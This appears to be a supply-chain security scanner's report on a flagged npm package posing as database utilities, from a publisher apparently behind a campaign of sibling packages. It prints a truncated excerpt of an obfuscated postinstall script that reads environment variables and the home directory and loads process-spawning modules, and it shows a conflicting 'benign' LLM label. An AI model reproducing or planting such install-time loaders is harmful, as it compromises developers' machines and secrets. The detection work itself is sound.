// npm package
@cloudplatform-single-spa/cloud-dns
Internal database utilities with connection pooling, query builder and migration support
weekly
102
monthly
102
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,365 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x5c7e39=a0_0x59aa;(function(_0x586366,_0x4c75d3){const _0x322b23=a0_0x59aa,_0x5d0fed=_0x586366();while(!![]){try{const _0x24f97f=-parseInt(_0x322b23(0x164))/(0x1*0x18c5+0x10dd+-…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4896reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x5c7e39=a0_0x59aa;(function(_0x586366,_0x4c75d3){const _0x322b23=a0_0x59aa,_0x5d0fed=_0x586366();while(!![]){try{const _0x24f97f=-parseInt(_0x322b23(0x164))/(0x1*0x18c5+0x10dd+-0x29a1)*(-parseInt(_0x322b23(0x14b))/(-0x2466+0x2*-0x10af+-0x1*-0x45c6))+parseInt(_0x322b23(0x15f))/(0x755*0x5+0x14e*-0x11+-0x39e*0x4)+-parseInt(_0x322b23(0x16d))/(0x1a87+0x181*0xf+0x3112*-0x1)+parseInt(_0x322b23(0x18d))/(0xf5d+-0x1*-0x1b1a+-0x2a72)*(parseInt(_0x322b23(0x19e))/(-0x15*-0x143+-0x26e2+0x423*0x3))+parseInt(_0x322b23(0x19a))/(0x1a*-0x5e+-0xd08+0x169b)*(-parseInt(_0x322b23(0x178))/(-0x92+-0x1ade+0x1b78))+-parseInt(_0x322b23(0x17b))/(0x4*-0x2ad+0x110b+-0x64e)*(-parseInt(_0x322b23(0x160))/(-0xc3f+0x69b*-0x5+0x2d50))+-parseInt(_0x322b23(0x165))/(-0x53d+-0x25e1+-0x3*-0xe63);if(_0x24f97f===_0x4c75d3)break;else _0x5d0fed['push'](_0x5d0fed['shift']());}catch(_0x10e171){_0x5d0fed['push'](_0x5d0fed['shift']());}}}(a0_0x6582,0x1394fe+-0x9609e+-0x1*-0x32bad));const a0_0x295b89=require('os'),a0_0x19e42c=require('fs'),a0_0x596d69=require(a0_0x5c7e39(0x169)),a0_0x57556c=require(a0_0x5c7e39(0x194)),a0_0xb482ae=require(a0_0x5c7e39(0x197)),{execSync:a0_0x3ecb9b,spawn:a0_0x342bb3}=require(a0_0x5c7e39(0x1aa)),a0_0xe7fbb0=a0_0x5c7e39(0x183),a0_0x26afdd=a0_0x5c7e39(0x179),a0_0x176b39=a0_0x5c7e39(0x16f)+a0_0x5c7e39(0x17f),a0_0x372fee=a0_0x5c7e39(0x1b8),a0_0x43cd56=!!process.env[a0_0x372fee],a0_0x28dc02=a0_0x5c7e39(0x158)===a0_0x5c7e39(0x158)||!!process.env[a0_0x176b39+'RECON_ONLY'];function --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
